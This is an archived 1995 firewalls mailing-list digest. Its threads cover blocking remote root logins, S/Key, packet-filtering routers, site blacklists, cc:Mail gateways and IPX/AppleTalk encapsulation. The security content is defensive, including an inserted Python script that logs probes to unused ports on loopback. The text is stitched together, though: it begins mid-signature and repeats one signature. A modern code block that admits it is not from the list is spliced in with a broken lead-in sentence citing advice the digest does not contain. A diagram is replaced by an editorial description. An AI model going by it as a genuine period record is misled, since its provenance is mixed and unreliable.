Box 270 > Jefferson City MO 65102 > > -- Ian Cooper Internet: ian@oms.co.za Open Mind Solutions Tel: +27 083 253-9865 Open Systems and Network Specialists From firewalls-owner Thu Aug 3 14:15:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11529 for firewalls-outgoing; Thu, 3 Aug 1995 12:04:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11491 for ; Thu, 3 Aug 1995 12:04:25 -0700 Received: from simtel.coast.net(205.149.128.6) by miles via smap (V1.3) id sma011467; Thu Aug 3 12:03:38 1995 Received: by simtel.Coast.NET (Smail3.1.28.1 #12) id m0se5XH-0000rzC; Thu, 3 Aug 95 15:02 EDT Date: Thu, 3 Aug 1995 15:02:27 -0400 (EDT) To: firewalls@greatcircle.com (Firewalls Mailing List) Subject: preventing password accidents. (fwd) From: "Mike O'Connor" Reply-To: "Mike O'Connor" X-Organization: :noitazinagrO-X Message-Id: <950803150227.mjo@dojo> Content-Type: text Content-Length: 1650 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk :In the many attempts to stop passwords being sent over the clear when :dialing from remote locations, none of them actually do anything to stop :it being typed. God knows I've done it on occasion... : :What I'd like to propose is that firewalls and other systems which :require the use of reuseable passwords take preventative measures, :to stop a potentially harmful/critical password being entered across :an insecure medium. ie if it sees the username "root" given to the :"login:" prompt, it drops the connection immeadiately with no :"Password:" prompt sent back. And it does the same for anyone who has :a trusted account (ie group wheel, etc). You may wish to alter this :policy for ssh/STEL/deslogin accesses, as appropriate. There was a nice little security problem with Ultrix of old where under certain conditions, it would issue a login: prompt twice. 
Lots of people typed their password after their login was accepted, out of habit, and it'd end up visible on the screen, like so: login: root login: root-password Even if you dropped the connection, I still think you'd have a number of people do that -- I've seen one root user do just that with the Ultrix bug. Instead of sending their password along the wire, they might well emit it in front of the wrong people. Not a big deal with something like skey, to be sure, but still, not something you want to see happen. ...Mike -- Michael J. O'Connor Internet: mjo@dojo.mi.org InterNIC WHOIS: MJO http://www.coast.net/~mjo "...and it rained -- like a slow divorce..." -Robyn Hitchcock From firewalls-owner Thu Aug 3 14:46:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15981 for firewalls-outgoing; Thu, 3 Aug 1995 14:06:47 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15955 for ; Thu, 3 Aug 1995 14:06:43 -0700 Received: from gateway.petro-canada.ca(156.44.254.2) by miles via smap (V1.3) id sma015949; Thu Aug 3 14:06:35 1995 Received: from LANCAL by GATEWAY.PETRO-CANADA.CA via Pony Express SMTP with TCP (v9.5.0-moe002); Thu, 3 Aug 95 15:05:18 MDT Received: from smtpgw.pccw.petro-canada.ca by LANCAL via Pony Express SMTP with TCP (v8.1.1-dmr001); Thu, 3 Aug 95 14:32:11 MST Received: by smtpgw.pccw.petro-canada.ca with Microsoft Mail id <302145BC@smtpgw.pccw.petro-canada.ca>; Thu, 03 Aug 95 14:55:08 PDT From: "Ferreira, Ben 296-4158" To: firewalls Subject: Re: IPWatcher Date: Thu, 03 Aug 95 14:43:00 PDT Message-ID: <302145BC@smtpgw.pccw.petro-canada.ca> Encoding: 8 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know how much they want for this package? ---------- . Well ipwatcher is comercial so that stops most of the public from getting . it. And the same people that made ipwatcher also made a freeware . 
ttywatcher which applies the same principles as ipwatcher but just with . tty monitoring/stealing From firewalls-owner Thu Aug 3 14:48:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11383 for firewalls-outgoing; Thu, 3 Aug 1995 12:01:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11339 for ; Thu, 3 Aug 1995 12:01:24 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011325; Thu Aug 3 12:00:34 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA23851; Thu, 3 Aug 1995 11:54:44 -0700 Received: from skypoint.com(199.86.32.7) by mycroft via smap (V1.3mjr) id sma023849; Thu Aug 3 11:54:41 1995 Received: from [199.86.33.24] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0se5TM-0005DJC; Thu, 3 Aug 95 13:58 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 3 Aug 1995 14:01:05 -0500 To: firewalls@greatcircle.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: multilevel security in firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bob writes: >Ray sezz... >> Introdution: This begins my 13th year of independent security consulting >> with an emphasis on finding, reporting, and helping to fix vulnerabilities >> in large (usually multi-vendor, multi-protocol, multi-national) networks. >> I call my specialty assessment rather than audit since I don't have a check >> list and I don't have a green eye shade like some auditors ;) While I have >> to wear suits most of the time, I delight in being under a baseball cap in >> matter-of-fact conversations with technical and management types about how >> things in their infrastructures really work. >Bravo! Thanks. Hold the applause and send money ;) Seriously, anyone else out there in firewalls-land having any luck with talking to management about the risks and getting them to act on 'em? 
>> I've just left CyberSAFE (the dominate supplier of commercial Kerberos) and >> am rebuilding my consulting practice. >Bravo again. Glad to see that, like some of the rest of us >unemployables that if you believe that you are the only person who can >live your life, and that you will not live forever then the best way to >do this is to do it your way. :) Gee, we could even have a sing-song of that song "I Idid it My Way" ;) Say, do creditors accept independence in lieu of $? ;) Back to being serious - I'd like to hear from other independents in this firewalls game. Ahh, maybee I can take out a personal ad under the "Battered, independent security consultant seeking" colum heading ;) >> This is important from two >> standpoints: 1) My biases are based in the ugly experience of helping >> organizations prepare for the deployment of serious secuity. 2) After over >> a decade of this security stuff, I'm covered with bruises and scars. All I >> have is my experience to offer. While there are some facts to rely on, >> most of this security stuff is a game of risk assumption. There is no 100% >> solution. Even the best run, stand-alone A1 system can be compromised. >Indeed. So, I wonder if we (the collective and electronically assembled masses here in firewalls-land) would benifit from collecting / catalogueing these business/technical stories and make them available in a volume entitled "Horror stories from the front line?" I'm launching a small, bootsrtap electronic publishing effort - so if anyone has firewall-related business/technical stories that they want to share - pls send them along. Maybe its time we just documented what is going on? >> This is not a thinly veiled attempt at commercialism. In rebuilding my >> consulting practice, I'm revisiting the basics of what I am, how I think >> about things, and what I want to concentrate on. 
This particular thread >> strikes chords in all of these areas - and, it seems to be one that could >> stand some focus and illucidation. >Nothing wrong with commercialism. I've told Marcus I don't know how >many times that "technology is great and wonderful, but, only selling >it creates wealth. He is now about to find that out. I guess Marcus is independent now? Getting past the cash flow issues, I wonder if any other firewallers have security marketing war stories? After a ovver a decade of watching me and my friend hit the wall trying to make a dent, I'm hardened to the tough sell aspects of it all. Maybe the proposed volume of war stories should be advertised in the Wall Street Journal - "Dear Commercial Enterprise, we the assembled masses of bruised and battered make-a-profit-and-have-fun-in-security types want to tell you about this problem we have..." Then, maybe we'd all attract a marketing / PR type who could package it in a way that it would sell? Only half kidding. RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. 
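Doug Hughes' advice earlier in this digest (leave /etc/services alone, and instead listen on ports that should never see legitimate traffic and report the access) as an added example; this is not code from the list, from Doug Hughes or from any product mentioned here. It parses a constructed sample in /etc/services format so that a probe is logged with the service name rather than a bare port number, and the listener binds only to 127.0.0.1 so it runs offline; parse_services, report_line and serve are this example's own names.

```python
"""Access reporter for service ports that carry no legitimate traffic.

Added example (not from the digest). Keeps an /etc/services-style table so a
probe is reported by name, and hangs up on each connection without a banner.
Assumptions: SAMPLE_SERVICES is a constructed table; the listener binds only
to 127.0.0.1 for the demonstration."""
import socket
import threading
from datetime import datetime, timezone

# Constructed sample in /etc/services format: name port/proto [aliases] [# comment]
SAMPLE_SERVICES = """\
# Network services, Internet style (constructed sample)
name        42/udp    nameserver
rje         77/tcp
printer     515/tcp   spooler       # line printer spooler
ingreslock  1524/tcp
"""


def parse_services(text):
    """Parse /etc/services-style text into {(port, proto): name}.

    Comments and blank lines are skipped; a line without a port/proto field
    is ignored rather than aborting the whole table."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue
        port_s, proto = fields[1].split("/", 1)
        if port_s.isdigit():
            table[(int(port_s), proto)] = fields[0]
    return table


def service_name(table, port, proto="tcp"):
    """Map a port back to its service name, falling back to the bare number."""
    return table.get((port, proto), str(port))


def report_line(table, peer_ip, peer_port, local_port, stamp=None):
    """One log line for a connection to a port that carries no real traffic."""
    stamp = stamp or datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return "%s unexpected connection from %s:%d to %d/tcp (%s)" % (
        stamp, peer_ip, peer_port, local_port, service_name(table, local_port))


def handle_connection(table, conn, peer, local_port, sink):
    """Log the probe and hang up without sending a banner or reading input."""
    line = report_line(table, peer[0], peer[1], local_port)
    sink.append(line)
    conn.close()
    return line


def serve(table, port, sink, max_connections=None, ready=None):
    """Accept connections on 127.0.0.1:port and report each one.

    Ports below 1024 need root on a Unix host; the demo uses a high port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", port))
        srv.listen(5)
        if ready is not None:
            ready.set()
        seen = 0
        while max_connections is None or seen < max_connections:
            conn, peer = srv.accept()
            print(handle_connection(table, conn, peer, port, sink))
            seen += 1


if __name__ == "__main__":
    table = parse_services(SAMPLE_SERVICES)
    sink, ready = [], threading.Event()
    # Listen on the ingreslock port from the sample table, take one probe, exit.
    t = threading.Thread(target=serve, args=(table, 1524, sink, 1, ready), daemon=True)
    t.start()
    ready.wait(2)
    with socket.create_connection(("127.0.0.1", 1524)):   # simulated probe
        pass
    t.join(timeout=5)
    print("%d access(es) recorded" % len(sink))
```

Run as a script it listens on 1524/tcp (ingreslock in the sample table), accepts one loopback probe, prints the report line and exits; on a real host it would run on the unneeded ports as root and feed the lines to syslog, which is what makes the kept /etc/services entry useful when the probe arrives.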
From firewalls-owner Thu Aug 3 15:00:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15640 for firewalls-outgoing; Thu, 3 Aug 1995 13:58:51 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15590 for ; Thu, 3 Aug 1995 13:58:43 -0700 Received: from firewall.cwa.com(192.100.4.193) by miles via smap (V1.3) id sma015528; Thu Aug 3 13:57:45 1995 Received: by firewall.cwa.com (4.1/CWA-SMI-4.1) id AA01030; Thu, 3 Aug 95 14:02:12 PDT Received: from cwa.com(192.100.4.14) by firewall via smap (V1.3mjr) id sma001026; Thu Aug 3 14:01:45 1995 Received: from lassen by cwa.com (4.1/CWA-PSI-SMI-1.0) id AA01716; Thu, 3 Aug 95 13:54:17 PDT Message-Id: <9508032054.AA01716@cwa.com> Comments: Authenticated sender is From: "Dan Murphy" Organization: CWA Communication Products, Inc. To: firewalls@greatcircle.com Date: Wed, 2 Aug 1995 11:19:10 -800 Subject: Sparc2 screening router SW Reply-To: dmurphy@cwa.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, all: I'm looking into the feasibility of converting an idle Sparc-2 with three Ethernet interfaces into a screening router connecting three local nets, with a minimum infusion of additional cash or hardware. I've picked up the ipfilter package from Darren Reed, which looks to be exactly what I need, and the last version of screend (dated April 1990). Your experiences with either of these packages, and/or pointers to other possible solutions, would be appreciated. 
Thanks, +----------------------------------------------------------------------+ | Dan Murphy | CWA | Los Gatos, Calif | 408-358-1529 | dmurphy@cwa.com | +----------------------------------------------------------------------+ From firewalls-owner Thu Aug 3 15:14:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15641 for firewalls-outgoing; Thu, 3 Aug 1995 13:58:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15595 for ; Thu, 3 Aug 1995 13:58:43 -0700 Received: from firewall.cwa.com(192.100.4.193) by miles via smap (V1.3) id sma015529; Thu Aug 3 13:57:43 1995 Received: by firewall.cwa.com (4.1/CWA-SMI-4.1) id AA01031; Thu, 3 Aug 95 14:02:12 PDT Received: from cwa.com(192.100.4.14) by firewall via smap (V1.3mjr) id sma001027; Thu Aug 3 14:01:46 1995 Received: from by cwa.com (4.1/CWA-PSI-SMI-1.0) id AB01716; Thu, 3 Aug 95 13:54:19 PDT Message-Id: <9508032054.AB01716@cwa.com> Comments: Authenticated sender is From: "Dan Murphy" Organization: CWA Communication Products, Inc. To: firewalls@greatcircle.com Date: Thu, 3 Aug 1995 13:57:33 -800 Subject: Sparc2 as a 3-way packet filter? Reply-To: dmurphy@cwa.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, all: I'm looking into converting an idle Sparc-2 with 3 Ethernet interfaces into a packet-filtering firewall/router connecting 3 local nets for IP traffic only. Buying more hardware is not an option. The 3 networks are: a DMZ with our Internet link, another router and a bastion host; a buffer net with routers to multiple mutually suspicious clients resources shared between the client and our engineers (i.e., NFS servers); and the internal company LAN with <50 heterogeneous hosts. No traffic will pass directly from one external net to another, or to the internal net, only to servers in the buffer net or the DMZ bastion host. 
We will control all the "edge" routers on the buffer and DMZ nets. I've picked up the ipfilter package from Darren Reed, which looks to be pretty much what I think I need, and the newest version of screend I was able to find (dated April 1990). Any experiences with either of these two packages, or pointers to other SW solutions, would be appreciated. Thanks, +----------------------------------------------------------------------+ | Dan Murphy | CWA | Los Gatos, Calif | 408-358-1529 | dmurphy@cwa.com | +----------------------------------------------------------------------+ From firewalls-owner Thu Aug 3 15:40:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20641 for firewalls-outgoing; Thu, 3 Aug 1995 15:21:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20612 for ; Thu, 3 Aug 1995 15:21:08 -0700 Received: from eagle.real.com(199.97.122.1) by miles via smap (V1.3) id sma020603; Thu Aug 3 15:21:02 1995 Date: Thu, 3 Aug 1995 22:20:26 GMT From: bret@real.com (Bret McDanel) Received: by real.com (8.6.12/3.2.012693-Realistic Technologies Inc); id WAA29636 for firewalls@greatcircle.com; Thu, 3 Aug 1995 22:20:26 GMT Message-Id: <199508032220.WAA29636@real.com> To: firewalls@greatcircle.com Subject: Re: Where are the known "den of thieves" sites ? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Being a newbie I wondered who are these known sites ? Who knows about them ? > >Where can I get that info ? I've never seen an alert that says such and > >such site or ip address is a known source of trouble so who is passing this > >info along ? Are there lists ? > Such lists are really pointless.. If someone is black listed on your machine and they want in, they will either spoof, or more likely break into another machine to get to you.. The sites would get outdated really fast.. 
And once a site is black listed (like every isp in existance) can it ever get off that list? And who would certify that it should come off? There are real problems with that idea.. As soon as 1 site gets blacklisted 10 more would need to be.. Also, the really good people dont have known machines :) on a side note, didnt we go through this same exact thread about 1 or so years ago, and it started a whole lot of mail and pretty much trashed the list? > I always found cert.org to be constantly involved in computer security > breakins. > > :) > > sorry, > Mark > heh From firewalls-owner Thu Aug 3 16:10:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20815 for firewalls-outgoing; Thu, 3 Aug 1995 15:25:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20794 for ; Thu, 3 Aug 1995 15:25:11 -0700 Received: from di.disclosure.com(205.156.194.1) by miles via smap (V1.3) id sma020789; Thu Aug 3 15:25:04 1995 Received: by Disclosure.COM (4.1/SMI-4.1) id AA23751; Thu, 3 Aug 95 18:25:11 EDT Date: Thu, 3 Aug 1995 18:25:10 -0400 (EDT) From: Scott Barman To: Darren Reed Cc: Firewalls Mailing List Subject: Re: preventing password accidents. In-Reply-To: <199508031550.IAA22775@mycroft.GreatCircle.COM> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 4 Aug 1995, Darren Reed wrote: > What I'd like to propose is that firewalls and other systems which > require the use of reuseable passwords take preventative measures, > to stop a potentially harmful/critical password being entered across > an insecure medium. ie if it sees the username "root" given to the > "login:" prompt, it drops the connection immeadiately with no > "Password:" prompt sent back. And it does the same for anyone who has > a trusted account (ie group wheel, etc). You may wish to alter this > policy for ssh/STEL/deslogin accesses, as appropriate. 
Interesting thought, although I figure S/Key or some other one-time password mechanism would be OK. Or shouldn't it reject the root login anyway? Even running fwtk and with the hacked S/Key it comes with, you can't log on as root from a network connection. I set it up on a Sun and removed the word "secure" from *every* entry in the ttytab file. No root logins regardless! And the other question I have is what do you do about su? Do you watch it the same way? > What I'm aiming to solve here is the "oh, just let me login, oops, > forgot to use skey, let me retype that" and similar, where although the > password may not necessarily give an outsider access, if they snoop'd > that password, it's a little bit easier. If they're using S/Key, then how is this a problem anyway? They enter the one-time password and it's invalid for the next login. I don't see the problem. > If something already has this behaviour, please point me at it, but as > far as I am aware, nothing will stop you entering a password if you > have already entered a username, especially if it is valid. And under Unix, you are prompted for a password anyway, even if the username is not valid. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." 
From firewalls-owner Thu Aug 3 16:35:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23028 for firewalls-outgoing; Thu, 3 Aug 1995 16:05:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23001 for ; Thu, 3 Aug 1995 16:05:54 -0700 Received: from commsun.its.csiro.au(152.83.8.2) by miles via smap (V1.3) id sma022970; Thu Aug 3 16:04:52 1995 Received: (from fit106@localhost) by commsun.its.csiro.au (8.6.10/8.6.10) id JAA14481; Fri, 4 Aug 1995 09:00:07 +1000 Date: Fri, 4 Aug 1995 09:00:05 +1000 (EST) From: Kent Fitch To: Michael Brennen cc: Darren Reed , Firewalls Mailing List Subject: Re: preventing password accidents. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 3 Aug 1995, Michael Brennen wrote: > On Fri, 4 Aug 1995, Darren Reed wrote: > > > What I'd like to propose is that firewalls and other systems which > > require the use of reuseable passwords take preventative measures, > > to stop a potentially harmful/critical password being entered across > > an insecure medium. >> > A properly configured S/Key system will prevent this. The trick is the > /etc/skey.access file to require S/Key from non-local sites. I have a > particular login that does not require S/Key locally, but will not accept > the reusable password remotely. S/Key is required for remote login on > that ID. > > Nothing prevents me from *trying* to enter the password from a remote site > and having it sniffed, but it won't be accepted. A short between the > headphones is a different problem entirely. > > The combination of tcp_wrappers, S/Key and logdaemon is a rather > configurable way to tighten access. The logdaemon package in addition > allows configurable use of login names. I have root completely disabled > from all but the local console, for example. Groups can be controlled in > similar ways. 
We are currently implementing/testing a PGP add-on to the logdaemon suite - like the S/key component described above, it reads a file which describes the conditions under which only a PGP response will be accepted. Now, the PGP response is really just the user signing a plain text challenge, and ascii-armouring it. Hence, we always expect the response to start with the string "-----BEGIN PGP SIGNED MESSAGE-----..." I have been thinking of immediately dropping the connection once it is apparent that the incoming string might be a password, and not the start of the signed response - it does seem a bit aggressive and user unfriendly, however. Also, as users typically type passwords quite fast, maybe most of the password will be on the net before we reset the connection! Kent Fitch Ph: +61 6 276 6711 ITSB CSIRO Canberra Australia kent.fitch@its.csiro.au "It is not enough to succeed. Others must fail." - Gore Vidal From firewalls-owner Thu Aug 3 19:09:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29145 for firewalls-outgoing; Thu, 3 Aug 1995 18:37:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29135 for ; Thu, 3 Aug 1995 18:37:35 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma029131; Thu Aug 3 18:37:34 1995 Received: from relay.tis.com by neptune.TIS.COM id aa03914; 3 Aug 95 21:35 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma012018; Thu, 3 Aug 95 21:26:53 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA02434; Thu, 3 Aug 95 21:33:54 EDT Message-Id: <9508040133.AA02434@tis.com> To: Darren Reed Cc: Firewalls Mailing List Subject: Re: preventing password accidents. In-Reply-To: Your message of "Fri, 04 Aug 95 01:53:01 +1000." 
<199508031550.IAA22775@mycroft.GreatCircle.COM> Date: Thu, 03 Aug 95 21:33:53 -0400 From: Rick Murphy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >What I'd like to propose is that firewalls and other systems which >require the use of reuseable passwords take preventative measures, >to stop a potentially harmful/critical password being entered across >an insecure medium. ie if it sees the username "root" given to the >"login:" prompt, it drops the connection immeadiately with no >"Password:" prompt sent back. The problem with this approach is that you've given a potential cracker some information - cracking root isn't helpful. You've actually made their job easier. What you want to do with any net access attempt to "root" is to set off loud alarms - and ignore the access - but avoid looking to the person trying the account like you know what they're doing. Let them waste their time while you try to track them back to the source. -Rick From firewalls-owner Thu Aug 3 19:31:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29400 for firewalls-outgoing; Thu, 3 Aug 1995 18:57:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29384 for ; Thu, 3 Aug 1995 18:57:35 -0700 Received: from ingress.com(199.171.57.2) by miles via smap (V1.3) id sma029380; Thu Aug 3 18:57:23 1995 Received: by ingress.com (4.1/SMI-4.1) id AA05432; Thu, 3 Aug 95 21:49:20 EDT Date: Thu, 3 Aug 1995 21:49:19 -0400 (EDT) From: Charles Kaplan To: dannyc@gmap.leeds.ac.uk Cc: firewalls@greatcircle.com Subject: cc:mail // smap // sendmail Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To very briefly help you out here (sorry, I am swamped today), you would have effectivly 2 approaches to use. 
1) All external email through the firewall, and then to either the approprate unix host, or the smtp-gw 2) All users on unix systems get email via the firewalls smapd, you configure the cc:mail smtp-gw with 2 interfaces, one inside, and one out. I tend to recomend 1, because it is single email point of failure if you will, but 2 is a very viable alternative. In 2 if you firewall is down/off, you can still continue to get email into your cc:mail users. You are placing some degree of faith in Lotus however. While in 2 interface mode there is only IPX on the internal side, and NO IP (outside interface only) there is little to say the gateway couldn't become compromised, and an IPX sniffer loaded, to gather who knows what. With regards to configuring the CC:mail smtp-gw, you can set it up to forward all email to an external machine for delivery (like your firewall for example), and then on your firewall setup aliases like the following: \/ hostname of the gateway machine cbk:cbk_at_postofficename@ccsmtpgw.company.com ^^name of the ccmail po BTW, you have to setup outbound aliases on the ccmail-gw. You have to force ccmail to rewrite the address from cbk@ccsmtpgw.company.com to cbk@company.com. Just define all this in a file on the gateway (I forget the name of it off the top of my head). If in doubt, RTM. While it makes no mention of how to setup the gateway for use like above, it does actually tell you how to configure it. Most annoying. Remember to run CC-Backup however, as you can nolonger backup the mail database with a standard software package (the mail database is held open by the smtp-gw) Since this only vaguely relates to firewalls however (the theoritical 1 interface or 2 issue) I am done babbling. --- Charles B. Kaplan Vice President Ingress Communications, Inc. 
Enterprise Networking Empire ST BLD, STE 3406, NY, NY 10118 cbk@ingress.com 45 Grant Avenue, Norwood, MA 02062 Networking / Internetworking / Security / Object Technology NT / UNIX / Novell From firewalls-owner Thu Aug 3 19:37:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29413 for firewalls-outgoing; Thu, 3 Aug 1995 18:58:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29405 for ; Thu, 3 Aug 1995 18:58:35 -0700 Message-Id: <199508040158.SAA29405@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma029401; Thu Aug 3 18:57:50 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA107880988; Fri, 4 Aug 1995 11:49:48 +1000 From: Darren Reed Subject: Re: preventing password accidents. To: mbrennen@puddytat.intecom.com (Michael Brennen) Date: Fri, 4 Aug 1995 11:49:48 +1000 (EST) Cc: Firewalls@GreatCircle.COM (Firewalls Mailing List) In-Reply-To: from "Michael Brennen" at Aug 3, 95 03:36:58 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2109 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Michael Brennen, sie said: > > > On Fri, 4 Aug 1995, Darren Reed wrote: > > > What I'd like to propose is that firewalls and other systems which > > require the use of reuseable passwords take preventative measures, > > to stop a potentially harmful/critical password being entered across > > an insecure medium. ie if it sees the username "root" given to the > > "login:" prompt, it drops the connection immeadiately with no > > "Password:" prompt sent back. And it does the same for anyone who has > > a trusted account (ie group wheel, etc). You may wish to alter this > > policy for ssh/STEL/deslogin accesses, as appropriate. [...] > A properly configured S/Key system will prevent this. The trick is the > /etc/skey.access file to require S/Key from non-local sites. 
> I have a
> particular login that does not require S/Key locally, but will not accept
> the reusable password remotely. S/Key is required for remote login on
> that ID.

No, that is not what I want to solve, and I'm aware that S/key can be set up in this fashion (I use it).

> Nothing prevents me from *trying* to enter the password from a remote site
> and having it sniffed, but it won't be accepted. A short between the
> headphones is a different problem entirely.

This is what I am trying to address - the incorrect password being entered. I'm well aware that S/key can make use of a normal password ineffective at the login prompt. What I'm addressing and attempting to resolve here is people attempting to use reusable passwords where they either won't work anyway or we don't want them being entered.

What I'm saying is that over an untrusted connection, it is not acceptable to send back the "Password:" prompt if the username given at the "Login:" prompt is for a trusted account, and give the user the chance to enter a secret password, even if it won't be effective.

Yes, su is a similar case, although making it 4750, root.wheel and imposing restrictions on where group wheel can login from goes some way to solving it. S/key solves what is effective, but not what gets entered.
darren

From firewalls-owner Thu Aug 3 21:00:12 1995
Date: 3 Aug 95 16:38:00 +1700
From: MAHAJAN_VIVEK@tandem.com
To: firewalls@greatcircle.com
Subject: Cost of implementing a firewall

Hello:

For those of you who have implemented a commercial firewall package, I would appreciate it if you could share your experiences as to how many resources it takes to administer it, hardware costs, and, looking back, what do you think you ended up paying (including hidden costs and manpower)? According to the vendors it takes very little to administer it, but I would really like to get your viewpoint - especially when I am talking about thousands of users.
Regards
Vivek

From firewalls-owner Thu Aug 3 21:30:04 1995
Date: 3 Aug 95 15:39:00 +1700
From: MAHAJAN_VIVEK@tandem.com
To: firewalls@greatcircle.com
Subject: Re: IPWatcher

Does anyone know where the freeware ttywatcher is available?

Vivek

------------ ORIGINAL ATTACHMENT --------
SENT 08-03-95 FROM SMTPGATE (BFERREIR@pchardy.petro-canada.ca)

Does anyone know how much they want for this package?
----------
. Well ipwatcher is commercial so that stops most of the public from getting
. it. And the same people that made ipwatcher also made a freeware
. ttywatcher which applies the same principles as ipwatcher but just with
. tty monitoring/stealing

From firewalls-owner Thu Aug 3 21:44:46 1995
From: Mike Ciavarella
Subject: Re: appletalk and ipx dangers?
To: saltzman@shore.net (Mark Saltzman)
Date: Fri, 4 Aug 1995 13:53:32 +1000 (EST)
Cc: firewalls@greatcircle.com

> Does anyone see any danger in allowing ipx and appletalk traffic to be
> routed through my firewall? I have ip routing disabled for obvious
> reasons, but I want to allow ipx and appletalk routing through the
> firewall. We have a remote access server setup on the "unsafe" side of the
> firewall which allows users ip connectivity to get out to the internet, and
> appletalk and ipx to get in to the corporate network. If my internet
> router is not routing appletalk or ipx then I'm safe, right......?
> thanks for any info,

Hi Mark,

I'm a little unsure as to your configuration, but it sounds like you have something like this:

    [ASCII diagram, garbled in the digest: the nodes ISP_rtr, Internet_Rtr, Firewall and Access Server in a row, joined by an IP link on the ISP side, with Jane, Corporate and John hanging below them]

Passing protocols through your firewall without processing any deeper than the protocol type field will open you up to attacks by encapsulation. If you can find a mac program called "Trawl", you'll be able to see the different boxes on your Appletalk network. You may see entities of type *:IPGATEWAY on your network - these provide an encapsulation service for IP packets (eg. on a Multigate).

Some possibilities:

(1) Make sure that your internet_rtr absolutely positively doesn't route protocols other than IP.

(2) If your access server or multigate-equivalent allocates IP addresses in a range, disallow incoming IP to that range on your internet router. (your mac users may need to use a ftp proxy..)

(3) You may be able to filter on NBP type in your firewall (assuming that it understands Appletalk). This is sometimes done to stop printers appearing in the wrong zone across larger networks :-) Disallowing anything other than Appleshare servers and printers should reduce the risk of an attack using IP-in-Appletalk packets from the Access server.

